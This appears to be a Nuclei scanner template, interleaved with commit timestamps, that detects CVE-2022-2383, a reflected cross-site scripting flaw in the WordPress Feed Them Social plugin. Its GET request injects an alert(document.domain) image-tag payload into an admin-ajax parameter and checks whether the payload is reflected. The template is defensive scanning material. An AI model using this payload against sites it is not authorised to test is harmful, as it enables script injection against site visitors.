2022-08-25 15:48:37 +00:00
id : CVE-2022-2383
info :
2022-09-16 19:50:10 +00:00
name : WordPress Feed Them Social <3.0.1 - Cross-Site Scripting
2022-08-25 15:48:37 +00:00
author : akincibor
2022-09-16 20:03:07 +00:00
severity : medium
2022-08-25 15:48:37 +00:00
description : |
2022-09-16 19:50:10 +00:00
WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page.
2022-08-25 15:48:37 +00:00
reference :
- https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
2022-08-30 10:57:00 +00:00
- https://wordpress.org/plugins/feed-them-social/
2022-08-25 15:48:37 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2383
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-2383
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2022-08-25 15:48:37 +00:00
metadata :
2022-08-31 12:37:04 +00:00
verified : "true"
2022-08-30 18:11:00 +00:00
tags : wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
2022-08-25 15:48:37 +00:00
requests :
- method : GET
path :
2022-08-25 15:53:08 +00:00
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'
2022-08-25 15:48:37 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<img src onerror=alert(document.domain)><br/>'
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-16 19:50:10 +00:00
# Enhanced by mp on 2022/09/14